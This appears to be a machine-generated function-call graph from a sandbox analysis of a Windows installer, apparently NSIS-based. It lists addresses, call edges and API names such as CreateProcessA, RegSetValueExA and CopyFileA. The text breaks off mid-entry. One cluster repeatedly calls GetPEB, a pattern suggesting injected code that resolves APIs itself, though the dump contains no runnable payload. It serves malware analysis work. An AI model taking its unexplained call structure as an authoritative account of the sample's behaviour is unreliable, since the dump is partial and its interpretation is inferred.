4118->4119 4119->4100 4120->4080 4121 403d1c CreateDialogParamA 4120->4121 4121->4080 4122 403d4f 4121->4122 4123 403e37 19 API calls 4122->4123 4124 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4123->4124 4125 401389 2 API calls 4124->4125 4126 403da0 4125->4126 4126->4075 4127 403da8 ShowWindow 4126->4127 4128 403e83 SendMessageA 4127->4128 4128->4080 4129->4110 4130->4113 4131->4116 4132 402164 4133 4029e8 18 API calls 4132->4133 4134 40216a 4133->4134 4135 4029e8 18 API calls 4134->4135 4136 402173 4135->4136 4137 4029e8 18 API calls 4136->4137 4138 40217c 4137->4138 4139 405d7c 2 API calls 4138->4139 4140 402185 4139->4140 4141 402196 lstrlenA lstrlenA 4140->4141 4142 402189 4140->4142 4144 404e23 25 API calls 4141->4144 4143 404e23 25 API calls 4142->4143 4146 402191 4143->4146 4145 4021d2 SHFileOperationA 4144->4145 4145->4142 4145->4146 4147 4019e6 4148 4029e8 18 API calls 4147->4148 4149 4019ef ExpandEnvironmentStringsA 4148->4149 4150 401a03 4149->4150 4152 401a16 4149->4152 4151 401a08 lstrcmpA 4150->4151 4150->4152 4151->4152 4153 4021e6 4154 402200 4153->4154 4155 4021ed 4153->4155 4156 405aa7 18 API calls 4155->4156 4157 4021fa 4156->4157 4158 405346 MessageBoxIndirectA 4157->4158 4158->4154 4166 401c6d 4167 4029cb 18 API calls 4166->4167 4168 401c73 IsWindow 4167->4168 4169 4019d6 4168->4169 4170 4025ed 4171 40287d 4170->4171 4172 4025f4 4170->4172 4173 4025fa FindClose 4172->4173 4173->4171 4174 40266e 4175 4029e8 18 API calls 4174->4175 4177 40267c 4175->4177 4176 402692 4179 40573d 2 API calls 4176->4179 4177->4176 4178 4029e8 18 API calls 4177->4178 4178->4176 4180 402698 4179->4180 4200 40575c GetFileAttributesA CreateFileA 4180->4200 4182 4026a5 4183 4026b1 GlobalAlloc 4182->4183 4184 40274e 4182->4184 4185 402745 CloseHandle 4183->4185 4186 4026ca 4183->4186 4187 402756 DeleteFileA 4184->4187 4188 402769 4184->4188 4185->4184 4201 4031da SetFilePointer 4186->4201 4187->4188 4190 4026d0 4191 4031a8 ReadFile 4190->4191 4192 4026d9 GlobalAlloc 4191->4192 4193 4026e9 4192->4193 4194 40271d WriteFile GlobalFree 4192->4194 4195 402f01 47 API calls 4193->4195 4196 402f01 47 API calls 4194->4196 4199 4026f6 4195->4199 4197 402742 4196->4197 4197->4185 4198 402714 GlobalFree 4198->4194 4199->4198 4200->4182 4201->4190 4202 40276f 4203 4029cb 18 API calls 4202->4203 4204 402775 4203->4204 4205 4027b0 4204->4205 4206 402799 4204->4206 4215 40264e 4204->4215 4208 4027c6 4205->4208 4209 4027ba 4205->4209 4207 40279e 4206->4207 4210 4027ad 4206->4210 4216 405a85 lstrcpynA 4207->4216 4212 405aa7 18 API calls 4208->4212 4211 4029cb 18 API calls 4209->4211 4217 4059e3 wsprintfA 4210->4217 4211->4215 4212->4215 4216->4215 4217->4215 4218 4014f0 SetForegroundWindow 4219 40287d 4218->4219 4220 404772 GetDlgItem GetDlgItem 4221 4047c6 7 API calls 4220->4221 4227 4049e3 4220->4227 4222 40486c DeleteObject 4221->4222 4223 40485f SendMessageA 4221->4223 4224 404877 4222->4224 4223->4222 4225 4048ae 4224->4225 4226 405aa7 18 API calls 4224->4226 4228 403e37 19 API calls 4225->4228 4230 404890 SendMessageA SendMessageA 4226->4230 4234 404acd 4227->4234 4256 404a57 4227->4256 4273 4046f2 SendMessageA 4227->4273 4233 4048c2 4228->4233 4229 404b7c 4231 404b91 4229->4231 4232 404b85 SendMessageA 4229->4232 4230->4224 4240 404ba3 ImageList_Destroy 4231->4240 4241 404baa 4231->4241 4246 404bba 4231->4246 4232->4231 4237 403e37 19 API calls 4233->4237 4234->4229 4238 404b26 SendMessageA 4234->4238 4261 4049d6 4234->4261 4235 404abf SendMessageA 4235->4234 4257 4048d0 4237->4257 4242 404b3b SendMessageA 4238->4242 4238->4261 4239 403e9e 8 API calls 4243 404d6c 4239->4243 4240->4241 4244 404bb3 GlobalFree 4241->4244 4241->4246 4248 404b4e 4242->4248 4244->4246 4245 4049a4 GetWindowLongA SetWindowLongA 4249 4049bd 4245->4249 4247 404d20 4246->4247 4259 40140b 2 API calls 4246->4259 4267 404bec 4246->4267 4250 404d32 ShowWindow GetDlgItem ShowWindow 4247->4250 4247->4261 4260 404b5f SendMessageA 4248->4260 4251 4049c3 ShowWindow 4249->4251 4252 4049db 4249->4252 4250->4261 4271 403e6c SendMessageA 4251->4271 4272 403e6c SendMessageA 4252->4272 4253 40499e 4253->4245 4253->4249 4256->4234 4256->4235 4257->4245 4257->4253 4258 40491f SendMessageA 4257->4258 4262 40495b SendMessageA 4257->4262 4263 40496c SendMessageA 4257->4263 4258->4257 4259->4267 4260->4229 4261->4239 4262->4257 4263->4257 4264 404cf6 InvalidateRect 4264->4247 4265 404d0c 4264->4265 4278 404610 4265->4278 4266 404c1a SendMessageA 4270 404c30 4266->4270 4267->4266 4267->4270 4269 404ca4 SendMessageA SendMessageA 4269->4270 4270->4264 4270->4269 4271->4261 4272->4227 4274 404751 SendMessageA 4273->4274 4275 404715 GetMessagePos ScreenToClient SendMessageA 4273->4275 4276 404749 4274->4276 4275->4276 4277 40474e 4275->4277 4276->4256 4277->4274 4279 40462a 4278->4279 4280 405aa7 18 API calls 4279->4280 4281 40465f 4280->4281 4282 405aa7 18 API calls 4281->4282 4283 40466a 4282->4283 4284 405aa7 18 API calls 4283->4284 4285 40469b lstrlenA wsprintfA SetDlgItemTextA 4284->4285 4285->4247 4286 404d73 4287 404d81 4286->4287 4288 404d98 4286->4288 4289 404e01 4287->4289 4290 404d87 4287->4290 4291 404da6 IsWindowVisible 4288->4291 4297 404dbd 4288->4297 4293 404e07 CallWindowProcA 4289->4293 4292 403e83 SendMessageA 4290->4292 4291->4289 4294 404db3 4291->4294 4295 404d91 4292->4295 4293->4295 4296 4046f2 5 API calls 4294->4296 4296->4297 4297->4293 4305 405a85 lstrcpynA 4297->4305 4299 404dec 4306 4059e3 wsprintfA 4299->4306 4301 404df3 4302 40140b 2 API calls 4301->4302 4303 404dfa 4302->4303 4307 405a85 lstrcpynA 4303->4307 4305->4299 4306->4301 4307->4289 4308 404275 4309 4042b3 4308->4309 4310 4042a6 4308->4310 4312 4042bc GetDlgItem 4309->4312 4314 40431f 4309->4314 4369 40532a GetDlgItemTextA 4310->4369 4313 4042d0 4312->4313 4317 4042e4 SetWindowTextA 4313->4317 4320 40560c 4 API calls 4313->4320 4322 405aa7 18 API calls 4314->4322 4330 404403 4314->4330 4367 40458f 4314->4367 4315 4042ad 4316 405ce3 5 API calls 4315->4316 4316->4309 4321 403e37 19 API calls 4317->4321 4319 403e9e 8 API calls 4324 4045a3 4319->4324 4325 4042da 4320->4325 4326 404302 4321->4326 4327 404395 SHBrowseForFolderA 4322->4327 4323 40442f 4328 405659 18 API calls 4323->4328 4325->4317 4333 405578 3 API calls 4325->4333 4329 403e37 19 API calls 4326->4329 4327->4330 4331 4043ad CoTaskMemFree 4327->4331 4332 404435 4328->4332 4334 404310 4329->4334 4330->4367 4371 40532a GetDlgItemTextA 4330->4371 4335 405578 3 API calls 4331->4335 4372 405a85 lstrcpynA 4332->4372 4333->4317 4370 403e6c SendMessageA 4334->4370 4337 4043ba 4335->4337 4340 4043f1 SetDlgItemTextA 4337->4340 4344 405aa7 18 API calls 4337->4344 4339 404318 4342 405da3 3 API calls 4339->4342 4340->4330 4341 40444c 4343 405da3 3 API calls 4341->4343 4342->4314 4350 404454 4343->4350 4345 4043d9 lstrcmpiA 4344->4345 4345->4340 4347 4043ea lstrcatA 4345->4347 4346 40448e 4373 405a85 lstrcpynA 4346->4373 4347->4340 4349 404497 4351 40560c 4 API calls 4349->4351 4350->4346 4355 4055bf 2 API calls 4350->4355 4356 4044e1 4350->4356 4352 40449d GetDiskFreeSpaceA 4351->4352 4354 4044bf MulDiv 4352->4354 4352->4356 4354->4356 4355->4350 4357 40453e 4356->4357 4359 404610 21 API calls 4356->4359 4358 404561 4357->4358 4360 40140b 2 API calls 4357->4360 4374 403e59 EnableWindow 4358->4374 4361 404530 4359->4361 4360->4358 4363 404540 SetDlgItemTextA 4361->4363 4364 404535 4361->4364 4363->4357 4365 404610 21 API calls 4364->4365 4365->4357 4366 40457d 4366->4367 4375 40420a 4366->4375 4367->4319 4369->4315 4370->4339 4371->4323 4372->4341 4373->4349 4374->4366 4376 404218 4375->4376 4377 40421d SendMessageA 4375->4377 4376->4377 4377->4367 4378 4022f5 4379 4022fb 4378->4379 4380 4029e8 18 API calls 4379->4380 4381 40230d 4380->4381 4382 4029e8 18 API calls 4381->4382 4383 402317 RegCreateKeyExA 4382->4383 4384 402341 4383->4384 4385 40264e 4383->4385 4386 402359 4384->4386 4387 4029e8 18 API calls 4384->4387 4388 402365 4386->4388 4390 4029cb 18 API calls 4386->4390 4389 402352 lstrlenA 4387->4389 4391 402380 RegSetValueExA 4388->4391 4392 402f01 47 API calls 4388->4392 4389->4386 4390->4388 4393 402396 RegCloseKey 4391->4393 4392->4391 4393->4385 4395 4027f5 4396 4029cb 18 API calls 4395->4396 4397 4027fb 4396->4397 4398 40282c 4397->4398 4399 40264e 4397->4399 4401 402809 4397->4401 4398->4399 4400 405aa7 18 API calls 4398->4400 4400->4399 4401->4399 4403 4059e3 wsprintfA 4401->4403 4403->4399 4404 19f1ae 4406 19f20d 4404->4406 4418 19ea37 GetPEB 4404->4418 4407 19f2f8 4406->4407 4409 19f305 4406->4409 4417 19f2bb 4406->4417 4419 19f4de 4407->4419 4409->4417 4432 19e5d7 4409->4432 4411 19f478 4412 19e5d7 4 API calls 4411->4412 4415 19f497 4412->4415 4413 19e5d7 4 API calls 4414 19f40b 4413->4414 4414->4411 4414->4413 4414->4417 4415->4417 4441 19e526 4415->4441 4418->4406 4450 19ea37 GetPEB 4419->4450 4421 19f4ec 4423 19f69f 4421->4423 4431 19f5f5 4421->4431 4451 19e6d8 4421->4451 4424 19e5d7 4 API calls 4423->4424 4423->4431 4425 19f6eb 4424->4425 4426 19f745 4425->4426 4427 19e5d7 4 API calls 4425->4427 4425->4431 4428 19e5d7 4 API calls 4426->4428 4427->4425 4429 19f75f 4428->4429 4430 19e526 4 API calls 4429->4430 4429->4431 4430->4431 4431->4417 4433 19e5f2 4432->4433 4434 19ea76 GetPEB 4433->4434 4435 19e613 4434->4435 4436 19e61b 4435->4436 4437 19e6a5 4435->4437 4439 19e772 3 API calls 4436->4439 4475 19e4f0 4437->4475 4440 19e68c 4439->4440 4440->4414 4442 19e541 4441->4442 4443 19ea76 GetPEB 4442->4443 4444 19e562 4443->4444 4445 19e5ac 4444->4445 4446 19e566 4444->4446 4478 19e502 4445->4478 4447 19e772 3 API calls 4446->4447 4449 19e5a1 4447->4449 4449->4417 4450->4421 4452 19e6eb 4451->4452 4460 19ea76 GetPEB 4452->4460 4454 19e70c 4455 19e710 4454->4455 4456 19e756 4454->4456 4462 19e772 GetPEB 4455->4462 4466 19e514 4456->4466 4459 19e74b 4459->4423 4461 19ea99 4460->4461 4461->4454 4463 19e7d7 4462->4463 4469 19eab4 GetPEB 4463->4469 4465 19e84b 4465->4459 4467 19e772 3 API calls 4466->4467 4468 19e51e 4467->4468 4468->4459 4470 19eac7 4469->4470 4472 19eadb 4470->4472 4473 19e986 GetPEB 4470->4473 4472->4465 4474 19e9b1 4473->4474 4474->4470 4476 19e772 3 API calls 4475->4476 4477 19e4fa 4476->4477 4477->4440 4479 19e772 3 API calls 4478->4479 4480 19e50c 4479->4480 4480->4449 4481 4024f8 4482 4029cb 18 API calls 4481->4482 4485 402502 4482->4485 4483 402578 4484 402536 ReadFile 4484->4483 4484->4485 4485->4483 4485->4484 4486 40257a 4485->4486 4488 40258a 4485->4488 4490 4059e3 wsprintfA 4486->4490 4488->4483 4489 4025a0 SetFilePointer 4488->4489 4489->4483 4490->4483 4491 4016fa 4492 4029e8 18 API calls 4491->4492 4493 401701 SearchPathA 4492->4493 4494 40171c 4493->4494 4495 4014fe 4496 401506 4495->4496 4498 401519 4495->4498 4497 4029cb 18 API calls 4496->4497 4497->4498 4499 403f7f 4500 403f95 4499->4500 4503 4040a2 4499->4503 4504 403e37 19 API calls 4500->4504 4501 404111 4502 4041e5 4501->4502 4505 40411b GetDlgItem 4501->4505 4510 403e9e 8 API calls 4502->4510 4503->4501 4503->4502 4509 4040e6 GetDlgItem SendMessageA 4503->4509 4506 403feb 4504->4506 4507 404131 4505->4507 4508 4041a3 4505->4508 4511 403e37 19 API calls 4506->4511 4507->4508 4516 404157 6 API calls 4507->4516 4508->4502 4512 4041b5 4508->4512 4530 403e59 EnableWindow 4509->4530 4514 4041e0 4510->4514 4515 403ff8 CheckDlgButton 4511->4515 4517 4041bb SendMessageA 4512->4517 4518 4041cc 4512->4518 4528 403e59 EnableWindow 4515->4528 4516->4508 4517->4518 4518->4514 4521 4041d2 SendMessageA 4518->4521 4519 40410c 4522 40420a SendMessageA 4519->4522 4521->4514 4522->4501 4523 404016 GetDlgItem 4529 403e6c SendMessageA 4523->4529 4525 40402c SendMessageA 4526 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4525->4526 4527 40404a GetSysColor 4525->4527 4526->4514 4527->4526 4528->4523 4529->4525 4530->4519 4531 401000 4532 401037 BeginPaint GetClientRect 4531->4532 4533 40100c DefWindowProcA 4531->4533 4534 4010f3 4532->4534 4536 401179 4533->4536 4537 401073 CreateBrushIndirect FillRect DeleteObject 4534->4537 4538 4010fc 4534->4538 4537->4534 4539 401102 CreateFontIndirectA 4538->4539 4540 401167 EndPaint 4538->4540 4539->4540 4541 401112 6 API calls 4539->4541 4540->4536 4541->4540 4556 401b06 4557 401b13 4556->4557 4558 401b57 4556->4558 4561 4021ed 4557->4561 4566 401b2a 4557->4566 4559 401b80 GlobalAlloc 4558->4559 4560 401b5b 4558->4560 4562 405aa7 18 API calls 4559->4562 4574 401b9b 4560->4574 4577 405a85 lstrcpynA 4560->4577 4563 405aa7 18 API calls 4561->4563 4562->4574 4565 4021fa 4563->4565 4569 405346 MessageBoxIndirectA 4565->4569 4575 405a85 lstrcpynA 4566->4575 4567 401b6d GlobalFree 4567->4574 4569->4574 4570 401b39 4576 405a85 lstrcpynA 4570->4576 4572 401b48 4578 405a85 lstrcpynA 4572->4578 4575->4570 4576->4572 4577->4567 4578->4574 4579 402607 4580 40260a 4579->4580 4584 402622 4579->4584 4581 402617 FindNextFileA 4580->4581 4582 402661 4581->4582 4581->4584 4585 405a85 lstrcpynA 4582->4585 4585->4584 3895 401389 3896 401390 3895->3896 3897 4013fe 3896->3897 3898 4013cb MulDiv SendMessageA 3896->3898 3898->3896 4593 401c8a 4594 4029cb 18 API calls 4593->4594 4595 401c91 4594->4595 4596 4029cb 18 API calls 4595->4596 4597 401c99 GetDlgItem 4596->4597 4598 4024aa 4597->4598 4599 40248e 4600 4029e8 18 API calls 4599->4600 4601 402495 4600->4601 4604 40575c GetFileAttributesA CreateFileA 4601->4604 4603 4024a1 4604->4603 4605 402012 4606 4029e8 18 API calls 4605->4606 4607 402019 4606->4607 4608 4029e8 18 API calls 4607->4608 4609 402023 4608->4609 4610 4029e8 18 API calls 4609->4610 4611 40202c 4610->4611 4612 4029e8 18 API calls 4611->4612 4613 402036 4612->4613 4614 4029e8 18 API calls 4613->4614 4616 402040 4614->4616 4615 402054 CoCreateInstance 4618 402073 4615->4618 4619 402129 4615->4619 4616->4615 4617 4029e8 18 API calls 4616->4617 4617->4615 4618->4619 4622 402108 MultiByteToWideChar 4618->4622 4620 401423 25 API calls 4619->4620 4621 40215b 4619->4621 4620->4621 4622->4619 4623 19eb4d 4628 19ea37 GetPEB 4623->4628 4625 19ed13 4626 19ebb2 4626->4625 4629 19f1b6 4626->4629 4628->4626 4643 19ea37 GetPEB 4629->4643 4631 19f20d 4632 19f2f8 4631->4632 4634 19f305 4631->4634 4642 19f2bb 4631->4642 4633 19f4de 5 API calls 4632->4633 4633->4642 4635 19e5d7 4 API calls 4634->4635 4634->4642 4637 19f40b 4635->4637 4636 19f478 4638 19e5d7 4 API calls 4636->4638 4637->4636 4639 19e5d7 4 API calls 4637->4639 4637->4642 4640 19f497 4638->4640 4639->4637 4641 19e526 4 API calls 4640->4641 4640->4642 4641->4642 4642->4625 4643->4631 4644 402215 4645 402223 4644->4645 4646 40221d 4644->4646 4648 402233 4645->4648 4649 4029e8 18 API calls 4645->4649 4647 4029e8 18 API calls 4646->4647 4647->4645 4650 4029e8 18 API calls 4648->4650 4652 402241 4648->4652 4649->4648 4650->4652 4651 4029e8 18 API calls 4653 40224a WritePrivateProfileStringA 4651->4653 4652->4651 4654 401595 4655 4029e8 18 API calls 4654->4655 4656 40159c SetFileAttributesA 4655->4656 4657 4015ae 4656->4657 4658 401d95 4659 4029cb 18 API calls 4658->4659 4660 401d9b 4659->4660 4661 4029cb 18 API calls 4660->4661 4662 401da4 4661->4662 4663 401db6 EnableWindow 4662->4663 4664 401dab ShowWindow 4662->4664 4665 40287d 4663->4665 4664->4665 4666 401e95 4667 4029e8 18 API calls 4666->4667 4668 401e9c 4667->4668 4669 405d7c 2 API calls 4668->4669 4670 401ea2 4669->4670 4672 401eb4 4670->4672 4673 4059e3 wsprintfA 4670->4673 4673->4672 4674 401696 4675 4029e8 18 API calls 4674->4675 4676 40169c GetFullPathNameA 4675->4676 4677 4016b3 4676->4677 4683 4016d4 4676->4683 4679 405d7c 2 API calls 4677->4679 4677->4683 4678 4016e8 GetShortPathNameA 4680 40287d 4678->4680 4681 4016c4 4679->4681 4681->4683 4684 405a85 lstrcpynA 4681->4684 4683->4678 4683->4680 4684->4683 4692 402419 4702 402af2 4692->4702 4694 402423 4695 4029cb 18 API calls 4694->4695 4696 40242c 4695->4696 4697 402443 RegEnumKeyA 4696->4697 4698 40244f RegEnumValueA 4696->4698 4699 40264e 4696->4699 4700 402468 RegCloseKey 4697->4700 4698->4699 4698->4700 4700->4699 4703 4029e8 18 API calls 4702->4703 4704 402b0b 4703->4704 4705 402b19 RegOpenKeyExA 4704->4705 4705->4694 4706 402299 4707 4022c9 4706->4707 4708 40229e 4706->4708 4710 4029e8 18 API calls 4707->4710 4709 402af2 19 API calls 4708->4709 4711 4022a5 4709->4711 4713 4022d0 4710->4713 4712 4029e8 18 API calls 4711->4712 4714 4022e6 4711->4714 4715 4022b6 RegDeleteValueA RegCloseKey 4712->4715 4717 402a28 RegOpenKeyExA 4713->4717 4715->4714 4718 402a53 4717->4718 4724 402a9f 4717->4724 4719 402a79 RegEnumKeyA 4718->4719 4720 402a8b RegCloseKey 4718->4720 4722 402ab0 RegCloseKey 4718->4722 4725 402a28 3 API calls 4718->4725 4719->4718 4719->4720 4721 405da3 3 API calls 4720->4721 4723 402a9b 4721->4723 4722->4724 4723->4724 4726 402acb RegDeleteKeyA 4723->4726 4724->4714 4725->4718 4726->4724 4727 401d1b GetDC GetDeviceCaps 4728 4029cb 18 API calls 4727->4728 4729 401d37 MulDiv 4728->4729 4730 4029cb 18 API calls 4729->4730 4731 401d4c 4730->4731 4732 405aa7 18 API calls 4731->4732 4733 401d85 CreateFontIndirectA 4732->4733 4734 4024aa 4733->4734 4735 401e1b 4736 4029e8 18 API calls 4735->4736 4737 401e21 4736->4737 4738 404e23 25 API calls 4737->4738 4739 401e2b 4738->4739 4740 4052e5 2 API calls 4739->4740 4743 401e31 4740->4743 4741 401e87 CloseHandle 4745 40264e 4741->4745 4742 401e50 WaitForSingleObject 4742->4743 4744 401e5e GetExitCodeProcess 4742->4744 4743->4741 4743->4742 4743->4745 4746 405ddc 2 API calls 4743->4746 4747 401e70 4744->4747 4748 401e79 4744->4748 4746->4742 4750 4059e3 wsprintfA 4747->4750 4748->4741 4750->4748 3432 401721 3433 4029e8 18 API calls 3432->3433 3434 401728 3433->3434 3438 40578b 3434->3438 3436 40172f 3437 40578b 2 API calls 3436->3437 3437->3436 3439 405796 GetTickCount GetTempFileNameA 3438->3439 3440 4057c2 3439->3440 3441 4057c6 3439->3441 3440->3439 3440->3441 3441->3436 4751 4023a1 4752 402af2 19 API calls 4751->4752 4753 4023ab 4752->4753 4754 4029e8 18 API calls 4753->4754 4755 4023b4 4754->4755 4756 4023be RegQueryValueExA 4755->4756 4761 40264e 4755->4761 4757 4023e4 RegCloseKey 4756->4757 4758 4023de 4756->4758 4757->4761 4758->4757 4762 4059e3 wsprintfA 4758->4762 4762->4757 4763 401922 4764 4029e8 18 API calls 4763->4764 4765 401929 lstrlenA 4764->4765 4766 4024aa 4765->4766 3581 403225 #17 SetErrorMode OleInitialize 3651 405da3 GetModuleHandleA 3581->3651 3585 403293 GetCommandLineA 3656 405a85 lstrcpynA 3585->3656 3587 4032a5 GetModuleHandleA 3588 4032bc 3587->3588 3589 4055a3 CharNextA 3588->3589 3590 4032d0 CharNextA 3589->3590 3595 4032dd 3590->3595 3591 403346 3592 403359 GetTempPathA 3591->3592 3657 4031f1 3592->3657 3594 40336f 3596 403393 DeleteFileA 3594->3596 3597 403373 GetWindowsDirectoryA lstrcatA 3594->3597 3595->3591 3598 4055a3 CharNextA 3595->3598 3602 403348 3595->3602 3665 402c5b GetTickCount GetModuleFileNameA 3596->3665 3599 4031f1 11 API calls 3597->3599 3598->3595 3601 40338f 3599->3601 3601->3596 3605 40340d 3601->3605 3750 405a85 lstrcpynA 3602->3750 3603 4033a4 3603->3605 3606 4033fd 3603->3606 3609 4055a3 CharNextA 3603->3609 3767 4035a6 3605->3767 3695 4035e3 3606->3695 3613 4033bb 3609->3613 3611 403426 3614 405346 MessageBoxIndirectA 3611->3614 3612 40350b 3615 40358e ExitProcess 3612->3615 3617 405da3 3 API calls 3612->3617 3619 4033d8 3613->3619 3620 40343c lstrcatA lstrcmpiA 3613->3620 3616 403434 ExitProcess 3614->3616 3621 40351a 3617->3621 3751 405659 3619->3751 3620->3605 3623 403458 CreateDirectoryA SetCurrentDirectoryA 3620->3623 3624 405da3 3 API calls 3621->3624 3626 40347a 3623->3626 3627 40346f 3623->3627 3628 403523 3624->3628 3775 405a85 lstrcpynA 3626->3775 3774 405a85 lstrcpynA 3627->3774 3629 405da3 3 API calls 3628->3629 3632 40352c 3629->3632 3634 40357a ExitWindowsEx 3632->3634 3639 40353a GetCurrentProcess 3632->3639 3634->3615 3638 403587 3634->3638 3635 4033f2 3766 405a85 lstrcpynA 3635->3766 3637 405aa7 18 API calls 3640 4034aa DeleteFileA 3637->3640 3805 40140b 3638->3805 3643 40354a 3639->3643 3642 4034b7 CopyFileA 3640->3642 3648 403488 3640->3648 3642->3648 3643->3634 3644 4034ff 3645 4057d3 38 API calls 3644->3645 3645->3605 3647 405aa7 18 API calls 3647->3648 3648->3637 3648->3644 3648->3647 3650 4034eb CloseHandle 3648->3650 3776 4057d3 3648->3776 3802 4052e5 CreateProcessA 3648->3802 3650->3648 3652 405dca GetProcAddress 3651->3652 3653 405dbf LoadLibraryA 3651->3653 3654 403268 SHGetFileInfoA 3652->3654 3653->3652 3653->3654 3655 405a85 lstrcpynA 3654->3655 3655->3585 3656->3587 3658 405ce3 5 API calls 3657->3658 3660 4031fd 3658->3660 3659 403207 3659->3594 3660->3659 3661 405578 3 API calls 3660->3661 3662 40320f CreateDirectoryA 3661->3662 3663 40578b 2 API calls 3662->3663 3664 403223 3663->3664 3664->3594 3808 40575c GetFileAttributesA CreateFileA 3665->3808 3667 402c9e 3694 402cab 3667->3694 3809 405a85 lstrcpynA 3667->3809 3669 402cc1 3810 4055bf lstrlenA 3669->3810 3673 402cd2 GetFileSize 3674 402dd3 3673->3674 3692 402ce9 3673->3692 3675 402bc5 32 API calls 3674->3675 3676 402dda 3675->3676 3678 402e16 GlobalAlloc 3676->3678 3676->3694 3815 4031da SetFilePointer 3676->3815 3677 4031a8 ReadFile 3677->3692 3681 402e2d 3678->3681 3679 402e6e 3682 402bc5 32 API calls 3679->3682 3686 40578b 2 API calls 3681->3686 3682->3694 3683 402df7 3684 4031a8 ReadFile 3683->3684 3687 402e02 3684->3687 3685 402bc5 32 API calls 3685->3692 3688 402e3e CreateFileA 3686->3688 3687->3678 3687->3694 3689 402e78 3688->3689 3688->3694 3816 4031da SetFilePointer 3689->3816 3691 402e86 3693 402f01 47 API calls 3691->3693 3692->3674 3692->3677 3692->3679 3692->3685 3692->3694 3693->3694 3694->3603 3696 405da3 3 API calls 3695->3696 3697 4035f7 3696->3697 3698 4035fd 3697->3698 3699 40360f 3697->3699 3826 4059e3 wsprintfA 3698->3826 3700 40596c 3 API calls 3699->3700 3701 403630 3700->3701 3703 40364e lstrcatA 3701->3703 3705 40596c 3 API calls 3701->3705 3704 40360d 3703->3704 3817 403897 3704->3817 3705->3703 3708 405659 18 API calls 3709 403676 3708->3709 3710 4036ff 3709->3710 3712 40596c 3 API calls 3709->3712 3711 405659 18 API calls 3710->3711 3713 403705 3711->3713 3714 4036a2 3712->3714 3715 403715 LoadImageA 3713->3715 3716 405aa7 18 API calls 3713->3716 3714->3710 3720 4036be lstrlenA 3714->3720 3724 4055a3 CharNextA 3714->3724 3717 403740 RegisterClassA 3715->3717 3718 4037c9 3715->3718 3716->3715 3721 40377c SystemParametersInfoA CreateWindowExA 3717->3721 3722 4037d3 3717->3722 3719 40140b 2 API calls 3718->3719 3723 4037cf 3719->3723 3725 4036f2 3720->3725 3726 4036cc lstrcmpiA 3720->3726 3721->3718 3722->3605 3723->3722 3731 403897 19 API calls 3723->3731 3729 4036bc 3724->3729 3728 405578 3 API calls 3725->3728 3726->3725 3727 4036dc GetFileAttributesA 3726->3727 3730 4036e8 3727->3730 3732 4036f8 3728->3732 3729->3720 3730->3725 3733 4055bf 2 API calls 3730->3733 3734 4037e0 3731->3734 3827 405a85 lstrcpynA 3732->3827 3733->3725 3736 403864 3734->3736 3737 4037e8 ShowWindow LoadLibraryA 3734->3737 3828 404ef5 OleInitialize 3736->3828 3738 403807 LoadLibraryA 3737->3738 3739 40380e GetClassInfoA 3737->3739 3738->3739 3742 403822 GetClassInfoA RegisterClassA 3739->3742 3743 403838 DialogBoxParamA 3739->3743 3741 40386a 3744 403886 3741->3744 3745 40386e 3741->3745 3742->3743 3746 40140b 2 API calls 3743->3746 3747 40140b 2 API calls 3744->3747 3745->3722 3749 40140b 2 API calls 3745->3749 3748 403860 3746->3748 3747->3722 3748->3722 3749->3722 3750->3592 3843 405a85 lstrcpynA 3751->3843 3753 40566a 3754 40560c 4 API calls 3753->3754 3755 405670 3754->3755 3756 4033e3 3755->3756 3757 405ce3 5 API calls 3755->3757 3756->3605 3765 405a85 lstrcpynA 3756->3765 3763 405680 3757->3763 3758 4056ab lstrlenA 3759 4056b6 3758->3759 3758->3763 3760 405578 3 API calls 3759->3760 3762 4056bb GetFileAttributesA 3760->3762 3761 405d7c 2 API calls 3761->3763 3762->3756 3763->3756 3763->3758 3763->3761 3764 4055bf 2 API calls 3763->3764 3764->3758 3765->3635 3766->3606 3768 4035c1 3767->3768 3769 4035b7 CloseHandle 3767->3769 3770 4035d5 3768->3770 3771 4035cb CloseHandle 3768->3771 3769->3768 3844 4053aa 3770->3844 3771->3770 3774->3626 3775->3648 3777 405da3 3 API calls 3776->3777 3778 4057de 3777->3778 3779 40583b GetShortPathNameA 3778->3779 3782 405930 3778->3782 3887 40575c GetFileAttributesA CreateFileA 3778->3887 3781 405850 3779->3781 3779->3782 3781->3782 3784 405858 wsprintfA 3781->3784 3782->3648 3783 40581f CloseHandle GetShortPathNameA 3783->3782 3785 405833 3783->3785 3786 405aa7 18 API calls 3784->3786 3785->3779 3785->3782 3787 405880 3786->3787 3888 40575c GetFileAttributesA CreateFileA 3787->3888 3789 40588d 3789->3782 3790 40589c GetFileSize GlobalAlloc 3789->3790 3791 405929 CloseHandle 3790->3791 3792 4058ba ReadFile 3790->3792 3791->3782 3792->3791 3793 4058ce 3792->3793 3793->3791 3889 4056d1 lstrlenA 3793->3889 3796 4058e3 3894 405a85 lstrcpynA 3796->3894 3797 40593d 3799 4056d1 4 API calls 3797->3799 3800 4058f1 3799->3800 3801 405904 SetFilePointer WriteFile GlobalFree 3800->3801 3801->3791 3803 405320 3802->3803 3804 405314 CloseHandle 3802->3804 3803->3648 3804->3803 3806 401389 2 API calls 3805->3806 3807 401420 3806->3807 3807->3615 3808->3667 3809->3669 3811 4055cc 3810->3811 3812 4055d1 CharPrevA 3811->3812 3813 402cc7 3811->3813 3812->3811 3812->3813 3814 405a85 lstrcpynA 3813->3814 3814->3673 3815->3683 3816->3691 3818 4038ab 3817->3818 3835 4059e3 wsprintfA 3818->3835 3820 40391c 3821 405aa7 18 API calls 3820->3821 3822 403928 SetWindowTextA 3821->3822 3823 403944 3822->3823 3824 40365e 3822->3824 3823->3824 3825 405aa7 18 API calls 3823->3825 3824->3708 3825->3823 3826->3704 3827->3710 3836 403e83 3828->3836 3830 403e83 SendMessageA 3831 404f51 OleUninitialize 3830->3831 3831->3741 3833 404f3f 3833->3830 3834 404f18 3834->3833 3839 401389 3834->3839 3835->3820 3837 403e9b 3836->3837 3838 403e8c SendMessageA 3836->3838 3837->3834 3838->3837 3840 401390 3839->3840 3841 4013fe 3840->3841 3842 4013cb MulDiv SendMessageA 3840->3842 3841->3834 3842->3840 3843->3753 3845 405659 18 API calls 3844->3845 3846 4053be 3845->3846 3847 4053c7 DeleteFileA 3846->3847 3848 4053de 3846->3848 3849 403416 OleUninitialize 3847->3849 3850 40551d 3848->3850 3885 405a85 lstrcpynA 3848->3885 3849->3611 3849->3612 3850->3849 3855 405d7c 2 API calls 3850->3855 3852 405408 3853 405419 3852->3853 3854 40540c lstrcatA 3852->3854 3857 4055bf 2 